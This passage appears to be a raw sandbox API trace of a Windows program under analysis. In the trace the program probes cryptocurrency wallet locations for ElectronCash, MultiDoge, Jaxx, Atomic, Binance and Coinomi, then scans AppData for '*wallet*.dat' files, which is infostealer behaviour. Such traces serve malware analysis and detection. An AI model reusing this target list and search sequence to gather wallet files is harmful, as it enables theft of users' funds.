(lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electroncash\\wallets")) returned 0 [0207.305] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\\\default_wallet") returned 74 [0207.305] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\\\default_wallet", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.305] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.305] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\MultiDoge\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\" [0207.306] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\multidoge")) returned 0 [0207.306] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\\\multidoge.wallet") returned 65 [0207.306] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\\\multidoge.wallet", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.306] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.306] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\jaxx\\Local Storage\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\" [0207.306] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jaxx\\local storage")) returned 0 [0207.306] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\\\file__0.localstorage") returned 78 [0207.306] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\\\file__0.localstorage", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.306] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.307] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0207.307] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0207.307] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\000003.log") returned 78 [0207.307] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\000003.log", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.307] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.307] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0207.307] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0207.308] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\CURRENT") returned 75 [0207.308] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\CURRENT", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.308] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.309] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0207.309] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0207.309] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOCK") returned 72 [0207.309] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOCK", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.309] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.309] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0207.309] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0207.309] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOG") returned 71 [0207.309] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOG", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.310] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.310] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0207.310] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0207.310] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\MANIFEST-000001") returned 83 [0207.310] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\MANIFEST-000001", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.310] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.311] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0207.311] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0207.311] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\0000*") returned 73 [0207.311] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\0000*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.311] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.311] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Binance\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\" [0207.312] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\binance")) returned 0 [0207.312] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\\\app-store.json") returned 61 [0207.312] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\\\app-store.json", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.312] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.312] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Coinomi\\Coinomi\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" [0207.313] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\wallets")) returned 0 [0207.313] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.wallet") returned 69 [0207.313] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.wallet", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.313] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d414 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.313] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Coinomi\\Coinomi\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" [0207.313] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\wallets")) returned 0 [0207.313] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.config") returned 69 [0207.313] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.config", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x19d1c0, ftCreationTime.dwHighDateTime=0x75be0115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x19d1dc, ftLastWriteTime.dwLowDateTime=0x19d414, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x19d3e8, nFileSizeLow=0x74f8dc10, dwReserved0=0x19d1dc, dwReserved1=0x19d414, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0207.314] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19d538 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0207.314] wsprintfA (in: param_1=0x19d418, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*") returned 39 [0207.314] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*", lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x99cd521e, ftLastAccessTime.dwHighDateTime=0x1d798a9, ftLastWriteTime.dwLowDateTime=0x99cd521e, ftLastWriteTime.dwHighDateTime=0x1d798a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName=".", cAlternateFileName="")) returned 0x5e7dc8 [0207.314] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.314] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x99cd521e, ftLastAccessTime.dwHighDateTime=0x1d798a9, ftLastWriteTime.dwLowDateTime=0x99cd521e, ftLastWriteTime.dwHighDateTime=0x1d798a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="..", cAlternateFileName="")) returned 1 [0207.314] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.314] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.314] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d8015e0, ftCreationTime.dwHighDateTime=0x1d78bf8, ftLastAccessTime.dwLowDateTime=0x8f867fe0, ftLastAccessTime.dwHighDateTime=0x1d791ba, ftLastWriteTime.dwLowDateTime=0x8f867fe0, ftLastWriteTime.dwHighDateTime=0x1d791ba, nFileSizeHigh=0x0, nFileSizeLow=0x170ce, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="-WCP.wav", cAlternateFileName="")) returned 1 [0207.314] StrCmpCA (pszStr1="-WCP.wav", pszStr2=".") returned -1 [0207.314] StrCmpCA (pszStr1="-WCP.wav", pszStr2="..") returned -1 [0207.315] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-WCP.wav") returned 46 [0207.315] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.315] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="-WCP.wav") returned 8 [0207.315] PathMatchSpecA (pszFile="-WCP.wav", pszSpec="*wallet*.dat") returned 0 [0207.315] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-WCP.wav\\*") returned 48 [0207.315] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-WCP.wav\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d8015e0, ftCreationTime.dwHighDateTime=0x1d78bf8, ftLastAccessTime.dwLowDateTime=0x8f867fe0, ftLastAccessTime.dwHighDateTime=0x1d791ba, ftLastWriteTime.dwLowDateTime=0x8f867fe0, ftLastWriteTime.dwHighDateTime=0x1d791ba, nFileSizeHigh=0x0, nFileSizeLow=0x170ce, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="-", cAlternateFileName="")) returned 0xffffffff [0207.315] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7540260, ftCreationTime.dwHighDateTime=0x1d7982f, ftLastAccessTime.dwLowDateTime=0xc1abb6e0, ftLastAccessTime.dwHighDateTime=0x1d7982f, ftLastWriteTime.dwLowDateTime=0xc1abb6e0, ftLastWriteTime.dwHighDateTime=0x1d7982f, nFileSizeHigh=0x0, nFileSizeLow=0x104e2, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="32uPs3ZIWx _e.mp4", cAlternateFileName="32UPS3~1.MP4")) returned 1 [0207.315] StrCmpCA (pszStr1="32uPs3ZIWx _e.mp4", pszStr2=".") returned 5 [0207.315] StrCmpCA (pszStr1="32uPs3ZIWx _e.mp4", pszStr2="..") returned 5 [0207.315] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\32uPs3ZIWx _e.mp4") returned 55 [0207.315] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.316] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="32uPs3ZIWx _e.mp4") returned 17 [0207.316] PathMatchSpecA (pszFile="32uPs3ZIWx _e.mp4", pszSpec="*wallet*.dat") returned 0 [0207.316] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\32uPs3ZIWx _e.mp4\\*") returned 57 [0207.316] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\32uPs3ZIWx _e.mp4\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7540260, ftCreationTime.dwHighDateTime=0x1d7982f, ftLastAccessTime.dwLowDateTime=0xc1abb6e0, ftLastAccessTime.dwHighDateTime=0x1d7982f, ftLastWriteTime.dwLowDateTime=0xc1abb6e0, ftLastWriteTime.dwHighDateTime=0x1d7982f, nFileSizeHigh=0x0, nFileSizeLow=0x104e2, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="3", cAlternateFileName="")) returned 0xffffffff [0207.316] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fb1db70, ftCreationTime.dwHighDateTime=0x1d78bfc, ftLastAccessTime.dwLowDateTime=0x90944500, ftLastAccessTime.dwHighDateTime=0x1d7917b, ftLastWriteTime.dwLowDateTime=0x90944500, ftLastWriteTime.dwHighDateTime=0x1d7917b, nFileSizeHigh=0x0, nFileSizeLow=0xc1ca, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="3zCj9GZKe1AZa.png", cAlternateFileName="3ZCJ9G~1.PNG")) returned 1 [0207.316] StrCmpCA (pszStr1="3zCj9GZKe1AZa.png", pszStr2=".") returned 5 [0207.316] StrCmpCA (pszStr1="3zCj9GZKe1AZa.png", pszStr2="..") returned 5 [0207.316] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\3zCj9GZKe1AZa.png") returned 55 [0207.316] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.316] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="3zCj9GZKe1AZa.png") returned 17 [0207.316] PathMatchSpecA (pszFile="3zCj9GZKe1AZa.png", pszSpec="*wallet*.dat") returned 0 [0207.316] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\3zCj9GZKe1AZa.png\\*") returned 57 [0207.316] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\3zCj9GZKe1AZa.png\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fb1db70, ftCreationTime.dwHighDateTime=0x1d78bfc, ftLastAccessTime.dwLowDateTime=0x90944500, ftLastAccessTime.dwHighDateTime=0x1d7917b, ftLastWriteTime.dwLowDateTime=0x90944500, ftLastWriteTime.dwHighDateTime=0x1d7917b, nFileSizeHigh=0x0, nFileSizeLow=0xc1ca, dwReserved0=0x7a0076, dwReserved1=0x5c0058, cFileName="3", cAlternateFileName="")) returned 0xffffffff [0207.316] FindNextFileA (in: hFindFile=0x5e7dc8, lpFindFileData=0x19d2d0 | out: lpFindFileData=0x19d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25569ef0, 